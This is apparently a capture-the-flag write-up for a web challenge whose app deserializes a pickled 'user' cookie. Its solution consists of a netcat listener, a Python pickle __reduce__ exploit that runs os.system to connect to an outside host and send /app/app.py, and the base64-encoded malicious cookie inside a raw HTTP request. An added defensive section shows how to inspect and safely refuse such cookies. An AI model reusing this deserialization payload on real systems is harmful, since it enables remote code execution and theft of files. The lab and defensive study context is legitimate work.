DESCRIPTION
Albert is a junior developer who started building websites about a week ago.
Albert also likes to show off and brag about his top-notch security.
To prove Albert wrong, you have to figure out how to exploit this application and retrieve its source code.
Site can be accessed at:
"Good luck, this task will not be easy" - Albert.
QUESTION
Can you show some 1337 skills and retrieve the source code of Albert's application?
SOLUTION
```bash
nc -lvp 4444
```
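```python
import pickle
import base64
import os


class RCE:
    # pickle stores the callable and arguments returned by __reduce__;
    # pickle.loads() on the receiving side then invokes them.
    def __reduce__(self):
        cmd = ('python3 -c \'import socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.12.32.100",4444));s.sendall(open("/app/app.py", "r").read().encode("utf-8"));\'')
        return os.system, (cmd,)


if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    pickle.loads(pickled)  # local check: this also runs the command on the machine building the cookie
    print(base64.urlsafe_b64encode(pickled))
```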
```http
GET / HTTP/1.1
Host: 10.12.32.142
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: user=gASVxQAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjKpweXRob24zIC1jICdpbXBvcnQgc29ja2V0O3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEyLjMyLjEwMCIsNDQ0NCkpO3Muc2VuZGFsbChvcGVuKCIvYXBwL2FwcC5weSIsICJyIikucmVhZCgpLmVuY29kZSgidXRmLTgiKSk7J5SFlFKULg==
Connection: close
```
2b43c3edc21d40db9bc78ce9d11cf142
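The defensive side of the solution above, as an added example that is not part of the original write-up or of Albert's application: it disassembles a base64 pickle cookie without executing it and loads it through an unpickler that refuses every import. It assumes the server decodes the `user` cookie with `base64.urlsafe_b64decode` and `pickle.loads`; all function names and both sample cookies are constructed for illustration.

```python
import base64
import io
import pickle
import pickletools

# Opcodes that import a callable or invoke one while unpickling.
RISKY = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ",
         "NEWOBJ", "NEWOBJ_EX", "REDUCE", "BUILD"}


def risky_opcodes(cookie: str) -> list:
    """Statically list risky opcodes in a base64 pickle cookie (nothing is executed)."""
    raw = base64.urlsafe_b64decode(cookie)
    return [op.name for op, _arg, _pos in pickletools.genops(raw) if op.name in RISKY]


class NoGlobalsUnpickler(pickle.Unpickler):
    """Only plain data (dict, list, str, int, ...) can load; every import is refused."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def load_cookie(cookie: str):
    """Hardened replacement for the assumed pickle.loads(b64decode(cookie)) call."""
    raw = base64.urlsafe_b64decode(cookie)
    return NoGlobalsUnpickler(io.BytesIO(raw)).load()


class HarmlessCallable:
    """Constructed sample: same __reduce__ mechanism as the write-up, but it only calls len()."""

    def __reduce__(self):
        return len, ("abc",)


def encode(obj) -> str:
    return base64.urlsafe_b64encode(pickle.dumps(obj, protocol=4)).decode()


BENIGN_COOKIE = encode({"user": "albert"})   # constructed: plain session data
GADGET_COOKIE = encode(HarmlessCallable())   # constructed: carries a callable

if __name__ == "__main__":
    for label, cookie in (("benign", BENIGN_COOKIE), ("gadget", GADGET_COOKIE)):
        print(label, "risky opcodes:", risky_opcodes(cookie))
        try:
            print(label, "loaded:", load_cookie(cookie))
        except pickle.UnpicklingError as exc:
            print(label, "rejected:", exc)
```

Session data that never needs to be an arbitrary object is better carried as JSON with an HMAC signature, which removes the unpickling step entirely.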